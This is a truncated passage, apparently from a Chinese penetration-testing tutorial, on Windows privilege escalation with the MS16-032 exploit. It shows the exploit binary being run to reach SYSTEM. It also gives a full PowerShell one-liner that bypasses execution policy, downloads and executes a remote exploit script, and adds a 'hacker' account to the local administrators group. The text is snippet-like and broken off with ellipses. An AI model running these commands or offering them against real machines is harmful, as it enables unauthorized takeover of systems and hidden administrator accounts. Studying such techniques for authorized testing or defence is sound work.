这个时候权限就很明显的体现出来了,我们没有权限进行添加用户。 这时就到了我们本章的重点了,我在这里会用ms16-032进行提权。它提03、08、12问题不是很大,当然如果打补丁了肯定是不行的。我们先将漏洞上传上去。 这时候让我们使用命令ms16-032.exe "whoami"这时候可以看到自己的权限。 这时候变成了ststem,提权...
0x02在powershell里面,直接执行命令进行提权,简单粗暴 powershell -nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032-Applicationcmd.exe -commandline '/cnetlocalgroup ...
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'" 0x03下面就是...